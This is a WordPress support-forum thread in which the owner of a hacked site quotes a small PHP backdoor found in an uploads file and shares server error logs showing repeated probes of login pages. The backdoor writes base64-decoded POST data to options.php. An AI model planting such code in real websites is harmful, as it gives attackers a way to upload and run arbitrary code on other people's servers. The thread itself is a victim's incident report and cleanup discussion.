Weird Code In File

  • Looking through a hacked website files via FTP, I saw the following in WP-content/uploads.php:

    <?php
    if (isset($_POST[‘da’])) {
    file_put_contents(‘options.php’, base64_decode($_POST[‘da’]), LOCK_EX);
    }
    ?>

    I know base64_ isn’t kosher. I’m curious what they did or tried to do. I’m about to upload a new version and overwrite all. The blog was a few pages in posts but I still have the db files.

    Actually, in retrospect, I’ll move all to a new folder then install a fresh copy. I need my theme but will check dates of all files.

Viewing 16 replies (of 16 total)
  • Thread Starter SickSquirrel

    (@sicksquirrel)

    Thanks. The logs were overwritten but I found this last night:


    Sun Dec 25 17:44:29 2016] [error] [client 91.107.105.132] PHP Parse error: syntax error, unexpected $end in /mnt/glusterfs/apache/hosting-dir/xxxxxxx.com/wp-includes/wp-db.php on line 1635

    [Sun Dec 25 21:46:10 2016] [error] [client 66.249.69.196] PHP Parse error: syntax error, unexpected $end in /mnt/glusterfs/apache/hosting-dir/xxxxxx.com/wp-includes/wp-db.php on line 1635

    [Mon Dec 26 08:39:23 2016] [error] [client 50.203.216.14] PHP Parse error: syntax error, unexpected $end in /mnt/glusterfs/apache/hosting-dir/xxxx.com/wp-includes/wp-db.php on line 1635

    [Mon Dec 26 11:03:20 2016] [error] [client 157.55.39.243] PHP Parse error: syntax error, unexpected $end in /mnt/glusterfs/apache/hosting-dir/dxxxx.com/wp-includes/wp-db.php on line 1635

    I know some are search engines but they don’t belong sniffing anything but posts.

    Each appeared numerous times. I had several hundred tries on that file, /administrator, /wp-login.php, and a few other WordPress files. This is just one domain. This weekend I’ll go through more hacked site logs.

Viewing 16 replies (of 16 total)
  • The topic ‘Weird Code In File’ is closed to new replies.